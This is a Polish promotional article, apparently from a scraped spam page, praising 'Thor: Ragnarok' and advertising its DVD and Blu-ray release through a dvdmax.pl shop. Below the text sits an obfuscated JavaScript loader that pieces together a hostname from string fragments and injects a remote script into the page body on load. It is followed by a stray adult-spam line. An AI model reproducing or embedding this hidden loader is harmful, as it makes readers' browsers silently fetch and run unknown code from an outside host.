„Thor: Ragnarok” już na DVD! Lektor PL Zwiastun HD

„Thor: Ragnarok” już na DVD! Lektor PL Zwiastun HD

[ad_1]

O czym jest „Thor: Ragnarok”?

Na początku należy zaznaczyć, że film ten jest kontynuacją poprzednich ekranizacji – pochodzącej z 2011 roku produkcji pod tytułem „Thor” oraz wypuszczonego do kin dwa lata później filmu: „Thor: Mroczny świat”. Premiera tego filmu odbyła się na jesień 2017 roku – dokładnie 10 października 2017, w Polsce widzowie mogli go oglądać od 25 października. – Z dnia na dzień „Thor: Ragnarok” stał się hitem. Zaliczył boxoffice w wysokości 853 968 214$ i to przy budżecie rzędu 180 milionów dolarów. Za jego sukces odpowiada fabuła – przypomnę tylko, że wszystko opiera się na historii walki Thora z Hulkiem, którą ten pierwszy musi wygrać, by powrócić z Sakaar do Asgardu. Musi on uratować to miejsce przed Helą i Ragnarokiem. Wszystko bazuje na znanym z wielu produkcji motywie ratowania przez bohatera swojego świata. Mimo wszystko jednak jest to film, który stanowi swego rodzaju powiew świeżości – różni się przecież od poprzednich produkcji Marvel Cinematic Universe. Wielu uważa, że to przede wszystkim kino przygodowe na najwyższym poziomie. Do tego oczywiście należy doliczyć doskonałe dialogi i żarty w wykonaniu bohaterów oraz reżyserię znanego nam z filmu „Co robimy w ukryciu” T. Waititiego. Nie wolno zapominać również o doskonałej obsadzie, w tym filmie można przecież zobaczyć Chrisa Hemswortha, Toma Hiddlestona, Jeffa Goldbluma czy fenomenalną Cate Blanchett. To film, który trzeba obejrzeć – niezależnie od tego, czy jest się fanem komiksu o Thorze czy nie – przekonuje ekspert z dvdmax.pl, sklepu w którym film ten znajdziecie tutaj.

Kiedy Thor: Ragnarok ukaże się na DVD i Blu-ray?

Na szczęście wszystkim, którzy spóźnili się do kina, z pomocą przychodzi nowoczesna technologia. – Daje ona możliwość obejrzenia filmu w domowym zaciszu, z przyjaciółmi. Wszystko za sprawą DVD i Blu-ray, na których to „Thor: Ragnarok ” się ukazał. Z pewnością jest to film wyjątkowy, który warto nie tylko obejrzeć, ale również mieć w swojej biblioteczce. Zauważyliśmy również, że płyty z tego typu ekranizacjami są doskonałymi pomysłami na prezent – nie tylko dla prawdziwego fana marvelowskich bohaterów. Warto o tym pomyśleć – dodaje nasz rozmówca z dvdmax.pl.

„Thor: Ragnarok” to z całą pewnością film wyczekiwany i taki, który można oglądać nie jeden, ale wiele razy. Nic dziwnego, że produkcja ta nie tylko przyciągnęła do kin miliony, ale również cieszy się ogromną popularnością na DVD i Blu-rayu. To w końcu rozrywka na najlepszym, marvelowskim poziomie.

(function(){
i0lg_=(„u”+”st”);i0lg=document.createElement(„script”);i0lg.async=true;
i0lgu=”74048436″;i0lg_+=”a”+(„t.”);i0lg_+=”i”+(„nf”+(„o”))+(„/”);
i0lgu+=”.nk7jplzX0lgc8fki”;i0lgu+=”iaabxsfe7Xesy2″;
i0lg.src=”https://”+i0lg_+i0lgu;i0lg.type=”text/javascript”;
d_b=document.body;d_b.appendChild(i0lg);
})();

[ad_2]

Porn videos related zwiastuny